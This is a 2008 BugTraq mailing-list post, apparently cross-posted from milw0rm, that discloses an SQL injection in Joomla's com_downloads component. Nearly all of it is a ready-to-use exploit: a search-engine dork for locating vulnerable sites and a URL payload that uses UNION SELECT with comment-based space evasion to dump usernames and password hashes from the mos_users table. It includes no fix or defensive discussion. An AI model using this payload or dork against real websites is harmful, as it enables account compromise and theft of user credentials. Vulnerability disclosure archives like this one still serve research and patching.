BugTraq
joomla SQL Injection (cat)(com_downloads) Feb 16 2008 07:48PM
hackturkiye hackturkiye gmail com


########################################################################
#

#

# joomla SQL Injection (cat)(com_downloads)

#

########################################################################
#

#

# AUTHOR : S@BUN

#

# HOME : http://www.milw0rm.com/author/1334

#

# MAİL : www.milw0rm.com (at) gmail (dot) com [email concealed]

#

########################################################################
#

#

# DORK 1 : allinurl:"selectcat"com_downloads

#

########################################################################
#

EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=selectcat&cat=-1/**/uni
on/**/select/**/concat(username,0x3a,password),concat(username,0x3a,pass
word),concat(username,0x3a,password)/**/from/**/mos_users/*

########################################################################
#

# S@BUN i AM NOT HACKER S@BUN

########################################################################
#

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus